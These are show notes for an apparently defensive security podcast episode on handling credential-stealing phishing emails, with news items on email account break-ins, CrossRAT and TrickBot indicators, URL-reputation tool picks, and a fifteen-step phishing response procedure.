TOPIC: CREDENTIAL STEALING EMAILS WHAT CAN YOU DO
OUR GUEST WILL BE:
Martin Brough - Manager of the Security Solutions Engineering team in the email phishing industry
Topic of the day will be:
"Credential Stealing emails what can YOU do"
Show Notes:
Introductions
Introduce our Guest
Martin Brough
Twitters - @HackerNinja
Blog - InfoSec512.com
News-worthy:
The Register: Perv raided college girls' online accounts for nude snaps – by cracking their security questions. Personal info obtained to pull off 1,400 password resets. Now he's behind bars.
Powell's interest in all this was obtaining private sexually explicit photos, which people apparently store in their email accounts without much thought about security. It's not immediately clear why the large number of such images on the internet did not suffice.
Jonathan C. Powell, who hacked into over 1,000 email accounts in search of sexually explicit images and videos of college-aged women, was jailed for six months for computer fraud, the US Department of Justice said on Thursday.
"During that time frame, those Reset Utility accesses resulted in approximately 18,600 attempted password changes in connection with approximately 2,054 unique [Pace] email accounts, and approximately 1,378 successful password changes in connection with approximately 1,035 unique [Pace] email accounts," explained FBI special agent Christopher Merriman in the complaint.
2. The Hacker News: Beware! Undetectable CrossRAT malware targets Windows, MacOS, and Linux systems
The article states that “As CrossRAT is written in Java, it requires Java to be installed" Not entirely true, as the dropper can check for java, if none is present, can download JRE and run locally or can install “jportable launcher”.
Also, it is interesting that the article calls it undetectable in the title, but then tells you how to detect it by looking for a runkey.
3. Windows 10 Creator update breaks purposefully set security tweaks
4. TrickBot
Artifacts
Delivered by a Word Doc with Macros
So cscript and PowerShell to grab the dropper
PS gets the dropper and also launches one of the batch files to load
Stores files in %appdata%, so Appdata Roaming\localservice
Some oddly named binary
Client_ID file
Group_tag file
A directory named Modules
You can see a couple batch files in %temp% and the binary before it is copied
Persistence is a Task called “services update”
Named Pipes connection for PowerShell
The IP it uses was a US based hosting service
Site-worthy:
BDIR Pick
MalPedia - reports and info on malware families and their actors and yara signatures
https://malpedia.caad.fkie.fraunhofer.de/families
Malware Arch - Malware Reports
Martin - https://cymon.io/
Martin - https://domainIQ.com
Tools-worthy:
BDIR Picks
Put full URL into it so it can read the bad page
Good Screen Shot
Use the "Tools" option to get more data about the site - get ASNs as well
WhoIs, ASNs, Created Date, Country, IP
Screen Shot
Country, IP, ASN
Short Blacklist list
I prefer this one because it is US-based.
https://fortiguard.com/webfilter
Generally has the most current blacklist status (their own)
Also gives country
Safety Reputation
Domain age
https://talosintelligence.com/
Reputation details, web category
Country with map
Martin’s Picks
LOG-MD - www.LOG-MD.com
Sherlock
Topic of the DAY
Credential Stealing emails what can YOU do….
What to look for if you DON’T have a lab or also in your lab
Screen Shots – Good indicator a credential stealing site with an authentication page
Domain age - How old is the website in days or years. Is it new? DGA (Domain Generating Algorithms)
Blacklists – Is the domain in any blacklists, if so, why is the SMTP gateway not catching it
Category – Has the site been categorized (BLOG/Malware/etc.)
Reputation – Is this a Bad, Neutral or Good site
Country – Where is this URL from
Alexa Rating - How known is it
Evaluating it in a Lab
LOG-MD Babbeeeee
Steps to take when you get a Phishing email
1. Of course.. You get an alert of some kind or are notified
2. Get a copy of the email - You can’t evaluate it if you don’t have an actual copy, your help desk copy might not have the context correct
3. Evaluate the URL
In a lab, click all the way through, login too (fake creds)
Or with one of the URL eval sites
4. Block the URL - Ya need a Web Proxy of course
Or the IP in the firewall
5. Monitor the IPs in log management from your firewall logs
Who else went there
You will have a HUGE gap for offsite/roaming people
6. Consider Fast and Mass disabling of accounts
7. Recall the message from your mail servers
Keep people from opening it
8. Monitor any Internet facing non-2-Factor email logins
Unless you reset all your users that received the phish
9. Monitor any Internet facing non-2-Factor VPN logins
Unless you reset all your users that received the phish
10. Monitor any Internet facing non-2-Factor Cloud Storage logins
11. Monitor any Internet facing non-2-Factor Virtual Desktop logins
12. Monitor for password resets to make sure you got everybody
13. Contact the sender to say you have been owned
Assuming you know it actually came from them.. SMTP logs
14. Create a Report
What happened, how did it come in
What improvements can be made to avoid it
Improvements to monitoring or hunting
15. Update your Email Investigation process
You will improve each time
Someone will need to do this when YOU are not at work or sleeping